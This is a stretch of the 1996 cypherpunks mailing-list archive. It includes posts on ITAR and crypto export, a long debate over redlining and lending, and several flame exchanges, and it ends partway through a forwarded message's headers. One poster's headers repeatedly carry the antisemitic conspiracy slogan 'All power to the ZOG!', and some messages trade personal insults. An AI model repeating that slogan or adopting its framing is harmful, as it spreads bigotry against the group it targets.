should Texas expand the government benefits it distributes through the
Lone
Star card. 
 
Transactive won't say how much of its Lone Star investment went toward
solving major problems. But Ambrosino said he believes the company was
forced to pour millions into perfecting the system. 
 
"Certainly there have been problems that have developed during the
implementation of this system,'' said Palazzo. ""This is a new system. In
a
project of this size those issues are to be expected. I think the program
is
working, and that is the bottom line. ''
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 4 Dec 1996 07:28:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: [NO CRYPTO] Recommended reading.
Message-ID: <199612041528.HAA13860@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The current (Dec 2) issue of Forbes is a special -
the cover article is 'Cyber power gives financial
markets a veto over the President and Congress', by
Peter Huber. This has already been covered in this
list.

However, the real prize is a second complete magazine
included with the Forbes in a plastic bag - the
premiere issue of Forbes ASAP: "The Big Issue -
Where do we go from here?", which contains 53
essays from various commentators on the significance
and future of the techno revolution. I haven't 
finished it yet, but found the essays by Tom Wolfe
on the social implications of neuroscience and 
Mark Helprin on life's accelerating pace superb.

Other authors include: Gingrich, Fukuyama, Nader, 
Simon Schama, Rifkin, Esther Dyson, Al Goldstein,
Buckley, Paglia, Gates, Negroponte,, Richard Leakey,
Steven Weinberg, Brokaw, Limbaugh, Huber, and George
Gilder, among others.

Highly recommended!




Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael C Taylor (CSD)" <mctaylor@olympus.mta.ca>
Date: Wed, 4 Dec 1996 06:39:33 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: new mailing list & ITAR
In-Reply-To: <PTmDyD5w165w@bwalk.dm.com>
Message-ID: <Pine.OSF.3.90.961204103429.19991A-100000@olympus.mta.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> Meta-question: if someone posts strong crypto source code to the
> moderated mailing list, can the moderator(s) be prosecuted under ITAR?

The moderator would not prosecuted if the moderator & host machine wasn't 
located in USA and not a USA citizen and if the post was not from USA. 

The poster may be a target if located inside USA or a USA citizen. The 
moderator might be prosecuted if the post originated inside USA or went 
through USA to be exported outside USA & Canada.

Welcome to the rest of the world.

----
Michael C. Taylor <mctaylor@mta.ca>
Programmer, Mount Allison University





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamie@comet.net (jamie dyer)
Date: Wed, 4 Dec 1996 08:08:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: test
Message-ID: <Pine.BSF.3.95.961204110756.3957A-100000@atlas.comet.net>
MIME-Version: 1.0
Content-Type: text/plain


'scuse the spam....



jamie
------------------------------------------------------------------------------
jamie dyer                                          Send empty message to 
jamie@comet.net |          Comet.Net		|   pgpkey@comet.net
		|     Charlottesville, Va.  	|   for pgp public key.
		|        (804)295-2407		|
	        |     http://www.comet.net	|

       "Linux perceiveth of The Dos, the Dos perceiveth not of the Linux."
------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "captain.sarcastic" <kkoller@panix.com>
Date: Wed, 4 Dec 1996 08:22:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: no subject (file transmission)
Message-ID: <199612041622.LAA28641@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>From cypherpunks-errors@toad.com  Wed Dec  4 11:22:29 1996
Received: from RES2.RESNET.UPENN.EDU (root@RES2.RESNET.UPENN.EDU [130.91.195.242]) by mail1.panix.com (8.7.5/8.7.1/PanixM1.0+) with ESMTP id LAA14598 for <kkoller@panix.com>; Wed, 4 Dec 1996 11:22:24 -0500 (EST)
Received: from poboxer.pobox.com (poboxer.pobox.com [207.8.188.2]) by RES2.RESNET.UPENN.EDU (8.7.6/8.7.3) with ESMTP id LAA13349 for <kkoller@RES2.RESNET.UPENN.EDU>; Wed, 4 Dec 1996 11:23:19 -0500
Received: from toad.com (toad.com [140.174.2.1]) by poboxer.pobox.com (8.7.6/8.7.1) with ESMTP id LAA24598 for <kkoller@sarcasm.com>; Wed, 4 Dec 1996 11:21:08 -0500
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id EAA12176 for cypherpunks-outgoing; Wed, 4 Dec 1996 04:34:17 -0800 (PST)
Received: from uu.psi.com (uu.psi.com [136.161.128.3]) by toad.com (8.7.5/8.7.3) with SMTP id EAA12170 for <cypherpunks@toad.com>; Wed, 4 Dec 1996 04:34:13 -0800 (PST)
Received: by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via UUCP;
        id AA25881 for ; Wed, 4 Dec 96 07:26:15 -0500
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Wed, 04 Dec 96 06:51:51 EST
	for cypherpunks@toad.com
To: cypherpunks@toad.com
Subject: Re: Anyone considered adding crypto into Microsoft Outlook?
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Comments: All power to the ZOG!
Message-Id: <9PueyD62w165w@bwalk.dm.com>
Date: Wed, 04 Dec 96 06:50:07 EST
In-Reply-To: <01BBE14A.04580F10@crecy.ai.mit.edu>
Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
Sender: owner-cypherpunks@toad.com
Precedence: bulk

"Phillip M. Hallam-Baker" <hallam@ai.mit.edu> writes:
> 	It just struck me that it would probably make the most convenient =
> platform for integrating cryptography. After all MAPI is an open, =
> extensible API allowing ready access to the email "hooks" necessary. The =
> integration of an address book with the email system makes it very easy =
> to add public key information into a person's entry.

Yes, this would be feasible. Problem is, "cypher punks" don't write code.
They only write flames and postmaster complaints.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Wed, 4 Dec 1996 09:27:03 -0800 (PST)
To: Bovine Remailer <haystack@cow.net>
Subject: Re:
Message-ID: <3.0.32.19961204112605.006a6514@execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


>>I consider it my business also, when people are denied opportunity because
>>of where they live.
>
>Why not simply disagree with me?  You do not believe that people may
>lend their very own money, earned honestly, to anybody they please.

Actually, I never said that.  Anyone may.  I may hire only white people
(even with the intent not to hire others).  I will also pay the
consequences.  And if someone feels that they need to do this, the teachers
of civil disobedience indeed state it is their duty to.

Anyone may give their money to whomever they choose.  I was simply stating
it was morally wrong.

>If you are ashamed of that, change your mind.  If you are not ashamed,
>proclaim it the world and justify it.

I have never been ashamed of my opinions.  Its just that I never said they
couldn't do it.  I justify my position as follows:

It is costly to everyone in the state to have areas of under and
unemployment, poverty and usually high-crime rates.

It is unjust and costly to deny opportunity based upon residence.

It is just and efficient to allow markets to indeed be free instead of
falsely supporting a certain hegemony based upon residence.

Free and full competition is the only way to achieve a free market.  This
can only happen when access to capital is equal with regard to worthless
indicators (race, sex, residence and aga's favorite, sexual orientation).

I have never suggested that provably bad credit risks should be given money.

>>I may also hire whomever I wish, but I would have to pay the
>>consequences if I happened to discriminate based on a protected class
>>while doing so.  That is the society in which I live.  If I dont like
>>it, I try to change it.  Our society is not libertarian.
>
>Current policy doesn't matter if we are discussing the wisdom or
>justice of possible policies.

It does if my argument is that this part of the system *is* just.  I
realize you disagree, but I am sure you are not dismissing my argument
out-of-hand.  If you disagree, as you say, then disagree.

>It isn't clear to me whether you are discussing policy options or
>whether one should violate laws one does not like.  When an action is
>illegal, it is still permissible to discuss its legalization.

I agree.  I am not arguing that we need to withdraw Title VII.  Aparently
you are?

>>There are times when government should intervene.  I believe it
>>should be as infrequent as possible, but would not want to live in a
>>society where disinfranchised people have no possible recourse.  Your
>>choice would apparently be different.
>
>Perhaps.  In any event, it is important to understand precisely the
>mechanisms through which people are disenfranchised, if that is in
>fact what has happened.  It is also important to understand the
>ramifications of phrases like "no possible recourse".  To borrow
>money?  It is safe to say that most poor people should be saving money
>rather than borrowing it.

Why are you stepping around your opinion?  "...if that is in fact what has
happened."  Just say it.  You do not believe poor people are
disenfranchised.  I understand the ramifications of "no possible recourse".
 How should poor people save money?  Through some forms of civil
disobedience like stealing food and clothes and then putting that money in
the bank?  Of course, the police will understand.  The government will back
them.

Look, capital begets capital.  I favor increasing opportunity.  As I will
discuss below, there are reasons why capital does not flow to poor areas.

>>I have not heard serious doubts for a while that redlining occurs.
>
>It seems likely that people draw lines around certain areas and decide
>not to lend money there.  What is less clear is that this is
>unreasonable.  There may be a few good credit risks in poor
>neighborhoods.  But, it may just be too much trouble weeding through
>the others to make it a paying business.

I thought that it didnt matter where people came from as long as the risk
was low in reality.  Banks weed through the people coming to them from the
suburbs.  Is it harder for them to see past a red line?  More costly?  How?
 It is too much trouble because of the way that bankers think.

>It may also be the case that people lending money are behaving
>irrationally and drawing lines around neighborhoods for simple racial
>reasons and for no others.  There is a word for this: opportunity.

It also screws up the market.  I am glad that you admit that racism is
irrational.  That is the core as to why the problem doesnt go away.  It is
an infinite loop.  Current interests wont go there.  Generally, people who
understand the problem are without access to capital.  They would like to
go there.  They cant get capital.  When they approach current interests,
they wont go there.

>Bank of America was built by a man who perceived and exploited one
>such opportunity.  Italian shop keepers in California could not get
>good banking services for, it turned out, irrational reasons.
>

There are a few examples of people who actually realize this as a
problem/opportunity.  Oddly enough, this point reinforces mine.  Redlining
did exist.  Bank of America realized it and made a lot of money.  But it
still exists elsewhere.  Why dont business plans around the country spring
up on venture capitalists desks with an approved stamp on them?

>>I would love to have the financial wherewithal to startup such an
>>enterprise.  Unfortuantely I reside in one such neighborhood.
>
>People start businesses without their own capital all the time.  If
>there really is such a great opportunity, go find some rich people.
>Rich people, like other people, are always happy to hear about ways to
>make more money.  

Ahhh.  This is the key (which I probably did not make as clear as I should
have).  They wont.  It is a bit irrational, I know.  But we just discussed
irrationality.  Racism doesnt see green.  If it did, I agree with you that
capital would flow there.  It doesnt.

>They don't even have to put the money in for a long
>time.  Once you've set up a package of mortgages, you can sell them
>off on the CMO market which is liquid and, I believe, quite
>colorblind.  The beauty of this scheme is that you can take your
>profits right away and let other people take on the long term interest
>rate risk, default risk, and management hassles.  This will make your
>plan easier to sell to investors.

I agree with you that it is a financially attractive proposition.  At the
Center for Public Representation where I worked during Law School we
approached investors.  The ROI was extremely attractive not to mention the
added "goodwill" in a largely liberal community (I went to Law School in
Madison, Wisconsin).  No one bit.  Hmm?

>You might also look into the microlending market.  The idea is to lend
>poor people small amounts of money (less than $10,000) to start
>businesses and the like.  The default rates are claimed to be
>surprisingly low.  I have my doubts, but it sounds as if you do not.
>Good luck.

Actually, I am very glad you brought it up because I was just going to.
Microloans are successful not only in this country but in India and around
the world as well.  The Grammeen Bank initiated its microloan program in
India by loaning usually less than $100 to individuals.  They fixed up
their residences or started extremely small businesses.  The default rate
was less than 5%.  (BTW, the system also encouraged community by a system
of cyclical neighborhood lending where neighbors took responsibility for
neighbors).  

Compare this now to people whom banks would generally consider a good risk.
 College Graduates.  Generally, these folks live outside of the red line.
Good risks right?  What about those nasty student loan default rates?  The
red lines dont make business sense.

>>It is difficult enough to raise money to run a small business (and
>>turned out to be much easier to do without any bank lending at all).
>>I have talked with people about starting their own banks.
>
>In principle, there is no reason at all why banks are the only
>institutions that can lend money for mortgages.  There may be legal
>impediments, but then we are back to the actual culprit, the
>government.
>
>You might find that opening a bank was easier if all you had to do was
>take deposits and lend money rather than wading through the morass of
>legal requirements and paperwork.

I favor the elimination of illogical regulation.  I favor ridding banks of
burdensome personal property taxes.  Hopefully the deregulation set for
1997 will help.  My desire for regulation in this case is to eliminate
redlining.  It is far more burdensome to retain this system than it would
be to eliminate it.

>>When you are working to make sure all the bills are paid it is a bit
>>difficult to also build an entirely new socio-economic structure.
>
>You don't have to build an entirely new socio-economic structure.  You
>just have to find some good credit risks, some people with money to
>lend, and put them together taking a cut for yourself, unless the
>government has thrown up some obstacles to this.

I wish it were this easy.  Economically depressed areas need new structures
built.  The current structure adds to the cycle of poverty.  First,
earnings are low.  Second, costs are high (Warehouse foodstores dont locate
there so corner stores become the means of feeding the family ($$$)).
Again, business plans have been presented to no avail.  Even private
foundation subsidized events were tried.  To no avail.  

>No, actually they do care, they just don't think (correctly) that they
>can get it easily.
>
>I have no idea if your local bank has "anonymous accounts".  More
>probably, they have accounts for which they do not report transactions
>in excess of $10,000, but which are held by people they know fairly
>well.  This is more common than you might think, and not just for
>laundering drug money.  Tax evasion is widely practiced.

I am aware of this.  But drug dealers hold more cash than CEO's.  Aparently
the laundromat isnt open for everyone. ;-)

>But wouldn't the racist banks be hurting their business?  Doesn't the
>punishment go quite closely with the "crime"?

They would not be making as much as they could.  Irrational, I know.

>If you believe that there is a huge opportunity which the racist banks
>(i.e., all of them) will not take advantage of, you had better explain
>why there is nobody anywhere with any capital who wouldn't want to
>make even more money off poor people.  Can it really be the case that
>99+% of rich people will run fleeing from such a great opportunity?

I once believed much like you.  I saw an "opportunity" the existance of
which I could not explain.  It seemed irrational.  And it was.  Racism is
irrational.  As you seem aware (BTW, I applaud you on what seems to be an
honest degree of care) some are trying to break through the cycle.  The
south side of Chicago recently started there own bank.  It is working.  As
you mention, historically, the Bank of America story.  Redevelopment
efforts "seem" to abound.

>Oh, and speaking of racism, where do wealthy African-Americans invest
>their money?

Huh?  What is your point?

>>Everyone can now clamor that it just isnt true.  Banks have never
>>discriminated.  Its all a big lie.  Whatever.
>
>Banks have practiced discrimination, and not just against black
>people.  They have been able to get away with it.  How?  Because the
>government has protected the banking guild from competition.
>
>If opening a bank were as easy as forming a corporation, you would not
>see much discrimination, I assure you.  There is no reason why a bank
>shouldn't be that easy to open.

We agree.  But I feel that a legal elimination of redlining would decrease
costs to the industry.

>Appeals to the very people who are exploiting you are not likely
>to meet with success, are they?

If they never did we would still have slavery and only white, adult, male,
land-owners would vote.  While success is rare, it has prevailed when the
cause is just.

>>The real world I live in is just not as simple as the Libertarian Wet
>>Dream(TM).
>
>Then it should be fairly easy to refute my points instead making
>fatuous remarks such as the one above.

Come on, one fatuous remark in a whole post?  I thought that was good ;-)


>Red Rackham
>

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "captain.sarcastic" <kkoller@panix.com>
Date: Wed, 4 Dec 1996 08:53:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: no subject (file transmission)
Message-ID: <199612041652.LAA07860@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>From cypherpunks-errors@toad.com  Wed Dec  4 11:52:55 1996
Received: from RES2.RESNET.UPENN.EDU (root@RES2.RESNET.UPENN.EDU [130.91.195.242]) by mail2.panix.com (8.7.5/8.7.1/PanixM1.0) with ESMTP id LAA08214 for <kkoller@panix.com>; Wed, 4 Dec 1996 11:52:54 -0500 (EST)
Received: from serve.com (serve.com [206.1.57.2]) by RES2.RESNET.UPENN.EDU (8.7.6/8.7.3) with ESMTP id LAA15135 for <kkoller@RES2.RESNET.UPENN.EDU>; Wed, 4 Dec 1996 11:54:19 -0500
Received: from toad.com (toad.com [140.174.2.1]) by serve.com (8.7.6/8.7.3) with ESMTP id LAA32480 for <kkoller@sarcasm.com>; Wed, 4 Dec 1996 11:47:45 -0500
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id FAA12660 for cypherpunks-outgoing; Wed, 4 Dec 1996 05:30:37 -0800 (PST)
Received: from uu.psi.com (uu.psi.com [136.161.128.3]) by toad.com (8.7.5/8.7.3) with SMTP id FAA12644 for <cypherpunks@toad.com>; Wed, 4 Dec 1996 05:30:24 -0800 (PST)
Received: by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via UUCP;
        id AA29852 for ; Wed, 4 Dec 96 08:20:12 -0500
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Wed, 04 Dec 96 08:11:41 EST
	for cypherpunks@toad.com
To: cypherpunks@toad.com
Subject: Re: Angel and Javier can't unsubscribe!
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Comments: All power to the ZOG!
Message-Id: <PgyeyD69w165w@bwalk.dm.com>
Date: Wed, 04 Dec 96 08:10:48 EST
In-Reply-To: <v03007801aecae3e3d400@[207.167.93.63]>
Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
Sender: owner-cypherpunks@toad.com
Precedence: bulk

"Timothy C. May" <tcmay@got.net> writes:
<Racist garbage, this time directed at Hispanics>
> I'm beginning to think that Cypherpunks appeals especially to morons.
>
> --Tim May

Me too.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "captain.sarcastic" <kkoller@panix.com>
Date: Wed, 4 Dec 1996 08:55:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: no subject (file transmission)
Message-ID: <199612041655.LAA08241@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>From cypherpunks-errors@toad.com  Wed Dec  4 11:55:03 1996
Received: from RES2.RESNET.UPENN.EDU (root@RES2.RESNET.UPENN.EDU [130.91.195.242]) by mail1.panix.com (8.7.5/8.7.1/PanixM1.0+) with ESMTP id LAA17828 for <kkoller@panix.com>; Wed, 4 Dec 1996 11:55:01 -0500 (EST)
Received: from serve.com (serve.com [206.1.57.2]) by RES2.RESNET.UPENN.EDU (8.7.6/8.7.3) with ESMTP id LAA15267 for <kkoller@RES2.RESNET.UPENN.EDU>; Wed, 4 Dec 1996 11:56:37 -0500
Received: from toad.com (toad.com [140.174.2.1]) by serve.com (8.7.6/8.7.3) with ESMTP id LAA32629 for <kkoller@sarcasm.com>; Wed, 4 Dec 1996 11:50:14 -0500
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id FAA12517 for cypherpunks-outgoing; Wed, 4 Dec 1996 05:15:53 -0800 (PST)
Received: from mule0.mindspring.com (mule0.mindspring.com [204.180.128.166]) by toad.com (8.7.5/8.7.3) with ESMTP id FAA12512 for <cypherpunks@toad.com>; Wed, 4 Dec 1996 05:15:48 -0800 (PST)
Received: from default (slip166-72-219-242.ny.us.ibm.net [166.72.219.242]) by mule0.mindspring.com (8.8.2/8.7.3) with SMTP id NAA26708 for <cypherpunks@toad.com>; Wed, 4 Dec 1996 13:15:44 GMT
Message-Id: <1.5.4.32.19961204131259.0069a9d0@pop.pipeline.com>
X-Sender: jya@pop.pipeline.com
X-Mailer: Windows Eudora Light Version 1.5.4 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Wed, 04 Dec 1996 08:12:59 -0500
To: cypherpunks@toad.com
From: John Young <jya@pipeline.com>
Subject: OPE_nup
Sender: owner-cypherpunks@toad.com
Precedence: bulk

Two reports on BSA's letter Monday to Gore opposing crypto 
export regulations as "headed in the wrong direction." And
claims the administration has "significantly backtracked" since
announcing the new policy October 1. IBM, MS, et al are 
withdrawing earlier support for it.

Without change, BSA said, encryption export policies will fail as 
did Administration policy of Clipper.

-----

OPE_nup





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "captain.sarcastic" <kkoller@panix.com>
Date: Wed, 4 Dec 1996 08:55:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: no subject (file transmission)
Message-ID: <199612041655.LAA08274@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>From cypherpunks-errors@toad.com  Wed Dec  4 11:55:04 1996
Received: from RES2.RESNET.UPENN.EDU (root@RES2.RESNET.UPENN.EDU [130.91.195.242]) by mail2.panix.com (8.7.5/8.7.1/PanixM1.0) with ESMTP id LAA08377 for <kkoller@panix.com>; Wed, 4 Dec 1996 11:55:02 -0500 (EST)
Received: from poboxer.pobox.com (poboxer.pobox.com [207.8.188.2]) by RES2.RESNET.UPENN.EDU (8.7.6/8.7.3) with ESMTP id LAA15261 for <kkoller@RES2.RESNET.UPENN.EDU>; Wed, 4 Dec 1996 11:56:28 -0500
Received: from toad.com (toad.com [140.174.2.1]) by poboxer.pobox.com (8.7.6/8.7.1) with ESMTP id LAA29435 for <kkoller@sarcasm.com>; Wed, 4 Dec 1996 11:54:13 -0500
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id FAA12478 for cypherpunks-outgoing; Wed, 4 Dec 1996 05:12:53 -0800 (PST)
Received: from spain.it.earthlink.net (spain-c.it.earthlink.net [204.119.177.66]) by toad.com (8.7.5/8.7.3) with ESMTP id FAA12473 for <cypherpunks@toad.com>; Wed, 4 Dec 1996 05:12:48 -0800 (PST)
Received: from prosac (Cust62.Max20.Boston.MA.MS.UU.NET [153.35.79.62]) by spain.it.earthlink.net (8.7.5/8.7.3) with SMTP id FAA09364; Wed, 4 Dec 1996 05:12:32 -0800 (PST)
Message-ID: <32A579A8.718@earthlink.net>
Date: Wed, 04 Dec 1996 08:16:24 -0500
From: Stephen Boursy <boursy@earthlink.net>
X-Mailer: Mozilla 2.0 (Win95; U)
MIME-Version: 1.0
To: freedom-knights@jetcafe.org
CC: cypherpunks@toad.com
Subject: Re: The Rise and Fall of Cypherpunks WAS [Re: the Dennings] 
References: <Pine.SUN.3.91.961203233536.10915A-100000@crl11.crl.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-cypherpunks@toad.com
Precedence: bulk

Sandy Sandfort wrote:
> 
> C'punks,
> 
> On Tue, 3 Dec 1996, Dave Hayes wrote:
>
>> The very existance of the "profane" keeps the "sacred" in
>> existance as well. If you cannot see that, then John Grubor's
>> lesson is wasted on you.
> 
> If this bit of verbal legerdemain makes any sense at all
> (Logos?), then Grubor must be personally responsible for the
> existance of every saint on the Catholic calendar...not.


  Well saints come on go on the Roman Catholic calander--doesn't
mean a hell of a lot.

  Dr. Grubor does an excellent job of bring the vermin out of
the woodwork.

                        Steve





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <bryce@digicash.com>
Date: Wed, 4 Dec 1996 02:57:24 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: [NOISE]-- [PHILOSOPHYPUNKS] Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <32A50047.2D13@gte.net>
Message-ID: <199612041057.LAA07494@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> > > I made note to this list time and time again requesting that people not
> > > state the obvious - who owns what hardware and what rights they have to
> > > pull the plug or whatever.  I seriously doubt that even the least
> > > intelligent cypherpunk would misunderstand such a thing. Do you really
> > > believe that myself and other cypherpunks want to "seize" John's equip-
> > > ment, morally or otherwise?  You are correct about certain issues being
> > > complex, but one of the big failings of the crowd who supported Gilmore
> > > on this action was their failure to understand the point I've made here -
> > > that we *do* understand basic property rights, etc.
> 
> > Ah.  Then we are in agreement here.  My "Rule" in the House
> > Rules etc. simply stated the obvious fact, for the benefit of
> > those who need it stated, of Gilmore's sole authority over the
> > physical substrate.  I vaguely recall some subscribers implying
> > or stating otherwise during the vanish Vulis fracas.  It would
> > not at all surprise me if some people disagreed with this
> > simple premise--  they habitually do so with regard to "public"
> > establishments like bars and restaurants, and it isn't much of
> > a stretch to start thinking of cypherpunks as a similarly
> > "public" institution.
> 
> *We* are not in agreement.  If you insist on arguing that, I'll have to
> resort to the "Spock" clarification (a la Star Trek), that it's not merely
> what you say I object to, it's you I object to.


Um..  Whatever, dude.


Have a nice day.


Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMqVZC0jbHy8sKZitAQFdjQMAhFo4RA1n+O4Giksi+4alHibWZ3euNy9F
NZCh4q7V0KFxV4JScokr1lOYLnudsRaH61gHhyJ38mXXwfgKLbcg0Dd1iY8IiQit
8YvRXTqx+GLZI26aZ5UDL9FriMRbxSnf
=iRix
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Dec 1996 11:26:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: new mailing list & ITAR
In-Reply-To: <Pine.OSF.3.90.961204103429.19991A-100000@olympus.mta.ca>
Message-ID: <ig0eyD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Michael C Taylor (CSD)" <mctaylor@olympus.mta.ca> writes:

> On Tue, 3 Dec 1996, Dr.Dimitri Vulis KOTM wrote:
> 
> > Meta-question: if someone posts strong crypto source code to the
> > moderated mailing list, can the moderator(s) be prosecuted under ITAR?
> 
> The moderator would not prosecuted if the moderator & host machine wasn't 
> located in USA and not a USA citizen and if the post was not from USA. 
> 
> The poster may be a target if located inside USA or a USA citizen. The 
> moderator might be prosecuted if the post originated inside USA or went 
> through USA to be exported outside USA & Canada.

Years ago I was participating in a moderated cryptography mailing list
hosted in Japan. I'm sorry I don't recall the name of our gracious
moderated from Tohoku U. Eventually he had no time for it and let it die.
Anyway I recall posting Gilmore's DES code to that list. How ironic.

Anyway, it looks like almost every packet these days goes via mae-west and/or
mae-east.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Dec 1996 11:56:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Modulating the FM noise spectrum considered infeasible
In-Reply-To: <1.5.4.16.19961204051022.32b74fec@mail98.internetMCI.com>
Message-ID: <eL0eyD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Charley Musselman <c.musselman@internetmci.com> writes:

> At 10:38 AM 12/3/96 -0500, Bob Hettinga wrote:
> >At 9:52 am -0500 12/3/96, James A. Tunnicliffe wrote:
> >> At 2:55 am -0500 12/3/96, Timothy C. May wrote:
> >>> [...]Having said this, Johnson noise makes a superior noise source,
> >                          ^^^^^^^
> >>> if a physical source is desired.
> ><snip>
> >>Yours makes NOISE?  Impressive...
> >>
> >>In this case, I guess entropy is preferable to atrophy, though.  :-)
> >
> >Indeed.
> >
> >I've found that my Johnson only makes noise with the proper, er,
> >peripheral, though...
> 
> Geez, guys, what's this?  Pound the physicist day?  Johnson noise
> is the Brownian motion of electrons in an electronic circuit.  It
> is the irreducible noise, often measured in temperature (obvious?)

That's what I mean when I call the "cypher punks" "uncouth juveniles".
To them "Johnson" is only another name for a penis. Elliptic curves are
off-topic. One time pads are succeptible to brute-force attacks. Etc.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Wed, 4 Dec 1996 12:09:18 -0800 (PST)
To: pclow <pclow@extol.com.my>
Subject: RE: The Good dr. Dobbs
In-Reply-To: <96Dec5.012029gmt+0800.21892@portal.extol.com.my>
Message-ID: <Pine.LNX.3.95.961204121055.1173A-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 5 Dec 1996, pclow wrote:

> Sorry Dr Boz, but all I saw on the page was this :
> 
> "404 Not Found
> 
> The requested URL /whitepaper.htm was not found on this server. "

It probably wouldn't have hurt you to try:

	www.dsnt.com/whitepaper.html

as dropping (or adding) the trailing "l" is a common mistake, one
appearently made in this case as well. 



cheers, kinch







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "captain.sarcastic" <kkoller@panix.com>
Date: Wed, 4 Dec 1996 09:13:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: no subject (file transmission)
Message-ID: <199612041713.MAA12742@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>From cypherpunks-errors@toad.com  Wed Dec  4 12:13:32 1996
Received: from RES2.RESNET.UPENN.EDU (root@RES2.RESNET.UPENN.EDU [130.91.195.242]) by mail1.panix.com (8.7.5/8.7.1/PanixM1.0+) with ESMTP id MAA19692 for <kkoller@panix.com>; Wed, 4 Dec 1996 12:13:31 -0500 (EST)
Received: from poboxer.pobox.com (poboxer.pobox.com [207.8.188.2]) by RES2.RESNET.UPENN.EDU (8.7.6/8.7.3) with ESMTP id MAA16268 for <kkoller@RES2.RESNET.UPENN.EDU>; Wed, 4 Dec 1996 12:15:08 -0500
Received: from toad.com (toad.com [140.174.2.1]) by poboxer.pobox.com (8.7.6/8.7.1) with ESMTP id MAA32202 for <kkoller@sarcasm.com>; Wed, 4 Dec 1996 12:12:55 -0500
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id FAA12796 for cypherpunks-outgoing; Wed, 4 Dec 1996 05:40:42 -0800 (PST)
Received: from uu.psi.com (uu.psi.com [136.161.128.3]) by toad.com (8.7.5/8.7.3) with SMTP id FAA12790 for <cypherpunks@toad.com>; Wed, 4 Dec 1996 05:40:24 -0800 (PST)
Received: by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via UUCP;
        id AA02842 for ; Wed, 4 Dec 96 08:38:47 -0500
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Wed, 04 Dec 96 08:32:49 EST
	for cypherpunks@toad.com
To: cypherpunks@toad.com, freedom-knights@jetcafe.org
Subject: Re: The Rise and Fall of Cypherpunks WAS [Re: the Dennings] 
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Comments: All power to the ZOG!
